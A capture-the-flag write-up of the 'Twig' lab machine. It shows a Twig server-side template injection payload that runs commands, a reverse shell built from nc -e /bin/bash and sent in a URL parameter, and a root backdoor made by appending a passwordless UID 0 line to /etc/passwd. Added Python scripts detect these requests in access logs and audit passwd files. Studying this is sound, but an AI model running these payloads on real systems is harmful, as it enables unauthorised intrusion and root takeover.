HackerEnv Target: twig #3 Write Up
And I am back with a new beautiful platform.
Let’s do the Twig machine in this write up.
As always, I started with nmap
nmap -sT -A -p- -T5 10.0.101.1

We only got one open port! Let’s explore it and dig in.

We got a form. I submitted a normal request, and the form returned my name in the response.

Let’s read the source code to collect more information. Nothing in the source code is interesting, except this comment:

By googling Twig, you will learn that Twig is a template engine and that the bug here is Server Side Template Injection (SSTI).
This vulnerability allows attackers to execute expressions, and from there commands, within the parameters by just using {{COMMAND TO EXECUTE}} instead of the expected values.
Let’s try and see if I can execute code or not. I will submit 4*4 and see whether it evaluates the multiplication and returns 16.
I wrote {{4*4}} instead of my name

I intercepted the request with Burp Suite and sent it to the Repeater, and bingo, 16 is there

So the vulnerability exists. Let’s take advantage of it: I sent the payload below in the User field to find out the id
{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}

Let’s get a connection to explore the machine more.
I opened a listener on my machine with
nc -lvnp 8000
- 8000 is the port that I am going to listen on; you can choose any number
I connected to it by sending nc+-e+/bin/bash+MY IP+PORT as the User value
GET /?User={{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("nc+-e+/bin/bash+10.10.1.22+8000")}}&PhoneNumber=1&submit=Submit
- Put your IP and port instead of mine
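From the defensive side, the probe-then-payload sequence above leaves a clear trail in the web server's access log. The following Python script is an added example, not part of this write-up or the HackerEnv platform: it parses constructed Apache-style log lines that mirror these requests, URL-decodes each query parameter, and flags {{ }} expressions by indicator (an arithmetic probe like 4*4, access to _self.env, the registerUndefinedFilterCallback/getFilter pair, and a reverse-shell string). The sample log lines, the indicator names and the severity levels are my own constructions.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed sample access-log lines in Apache "combined" format. They mimic the
# requests in the write-up (a normal submit, the {{4*4}} probe, the id payload and
# the reverse-shell payload); they are not logs from the HackerEnv machine.
SAMPLE_LOG = """\
10.10.1.22 - - [01/Jan/2024:10:00:01 +0000] "GET /?User=nouuf&PhoneNumber=1&submit=Submit HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.10.1.22 - - [01/Jan/2024:10:00:05 +0000] "GET /?User=%7B%7B4*4%7D%7D&PhoneNumber=1&submit=Submit HTTP/1.1" 200 498 "-" "Mozilla/5.0"
10.10.1.22 - - [01/Jan/2024:10:00:09 +0000] "GET /?User=%7B%7B_self.env.registerUndefinedFilterCallback(%22exec%22)%7D%7D%7B%7B_self.env.getFilter(%22id%22)%7D%7D&PhoneNumber=1&submit=Submit HTTP/1.1" 200 530 "-" "Mozilla/5.0"
10.10.1.22 - - [01/Jan/2024:10:00:15 +0000] "GET /?User=%7B%7B_self.env.registerUndefinedFilterCallback(%22exec%22)%7D%7D%7B%7B_self.env.getFilter(%22nc+-e+/bin/bash+10.10.1.22+8000%22)%7D%7D&PhoneNumber=1&submit=Submit HTTP/1.1" 200 0 "-" "Mozilla/5.0"
"""

# Fields we need from each log line: client IP, timestamp, method, request target, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d+)'
)

# A Twig/Jinja-style expression: anything between {{ and }} after URL decoding.
TEMPLATE_EXPR = re.compile(r"\{\{(.*?)\}\}", re.S)

# Indicator name -> regex applied to the decoded body of each {{ ... }} expression.
INDICATORS = {
    "arithmetic_probe": re.compile(r"^\s*\d+\s*[*+\-/]\s*\d+\s*$"),
    "twig_env_access": re.compile(r"_self\.env"),
    "filter_callback_abuse": re.compile(r"registerUndefinedFilterCallback|getFilter"),
    "reverse_shell_string": re.compile(r"\bnc\b.*-e|/bin/(ba)?sh"),
}


def severity(indicators):
    """Map the matched indicators to a triage level (levels are my own choice)."""
    if "reverse_shell_string" in indicators or "filter_callback_abuse" in indicators:
        return "critical"
    if "twig_env_access" in indicators:
        return "high"
    if "arithmetic_probe" in indicators:
        return "low"
    return "info"


def scan_access_log(text):
    """Return one finding per (line, query parameter) that carries a {{ }} expression."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        m = LOG_RE.match(line)
        if not m:
            continue
        query = urlsplit(m.group("target")).query
        # parse_qsl percent-decodes values and turns '+' into spaces, so the
        # expressions below are what the application actually received.
        for param, value in parse_qsl(query, keep_blank_values=True):
            exprs = TEMPLATE_EXPR.findall(value)
            if not exprs:
                continue
            hits = sorted({name for e in exprs
                           for name, rx in INDICATORS.items() if rx.search(e)})
            findings.append({
                "line": lineno,
                "ip": m.group("ip"),
                "param": param,
                "expressions": exprs,
                "indicators": hits,
                "severity": severity(hits),
            })
    return findings


if __name__ == "__main__":
    for f in scan_access_log(SAMPLE_LOG):
        print(f"line {f['line']} {f['severity']:8} {f['ip']} param={f['param']} "
              f"indicators={','.join(f['indicators'])}")
```

Decoding before matching matters: the braces arrive as %7B%7B and the shell spaces as +, so a rule that looks for a literal {{ in the raw request line would miss every one of these requests. The arithmetic probe on its own is low severity but is the earliest signal; in the sample it precedes the command-execution payloads by seconds from the same client.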
After getting the connection, I explored the machine with
ls -l
and found the first flag

I explored the machine and there was nothing interesting, so privilege escalation came to my mind. I went to /etc/passwd to see if I could write to it

and yes, it is writable
so now I am going to create a root account for myself with
echo "nouuf::0:0:root:/root:/bin/bash" >> /etc/passwd
- nouuf is the username; you can put whatever you want instead.
After creating the account, print the passwd file content to see your account with
cat /etc/passwd

So let’s switch to the ROOT account with
su nouuf
- su username
Switching was not working for me, so I decided to upgrade my shell to see what was going on with
python3 -c "import pty; pty.spawn('/bin/bash');"
When I disconnected and connected again, privilege escalation WORKS
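The escalation works only because /etc/passwd is writable and the appended entry combines an empty password field with UID 0. As an added example that is not from the write-up, this Python check audits a passwd file for exactly those conditions: it parses the entries, flags any non-root UID 0 account and any empty password field, and reports group- or world-writable permission bits. SAMPLE_PASSWD is constructed data that reproduces the injected line; the function names are my own.

```python
import os
import stat

# Constructed /etc/passwd content that reproduces the entry the write-up appends
# (empty password field, UID/GID 0). Sample data, not the target machine's file.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
nouuf::0:0:root:/root:/bin/bash
"""


def audit_passwd_entries(text):
    """Flag entries that grant root or need no password. Returns (line, issue, user) tuples."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append((lineno, "malformed_entry", line))
            continue
        name, pw, uid, _gid, _gecos, _home, _shell = fields
        # Any second UID-0 account is a backdoor; a healthy system has only root.
        if uid == "0" and name != "root":
            findings.append((lineno, "extra_uid0", name))
        # An empty password field means login with no password at all
        # ('x' or '*' defers to /etc/shadow, which is the normal state).
        if pw == "":
            findings.append((lineno, "empty_password_field", name))
    return findings


def audit_passwd_mode(mode):
    """Report write bits that let non-root users edit the file. mode is the permission bits only."""
    issues = []
    if mode & stat.S_IWOTH:
        issues.append("world_writable")
    if mode & stat.S_IWGRP:
        issues.append("group_writable")
    return issues


def audit_passwd_file(path="/etc/passwd"):
    """Run both checks against a real file on this host."""
    with open(path, encoding="utf-8") as fh:
        content = fh.read()
    mode = stat.S_IMODE(os.stat(path).st_mode)
    return {"entries": audit_passwd_entries(content), "mode": audit_passwd_mode(mode)}


if __name__ == "__main__":
    print("sample data:", audit_passwd_entries(SAMPLE_PASSWD), audit_passwd_mode(0o666))
    try:
        print("this host:", audit_passwd_file())
    except OSError as exc:  # e.g. not a Unix host
        print("could not read /etc/passwd:", exc)
```

On a correctly configured system the expected result is an empty findings list and mode 0o644; either a second UID 0 entry or a group/world write bit is enough to treat the host as compromised or misconfigured, and the check runs just as well inside a cron job or a configuration-management test.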

So listing with root privileges will give you the second flag
ls -l /root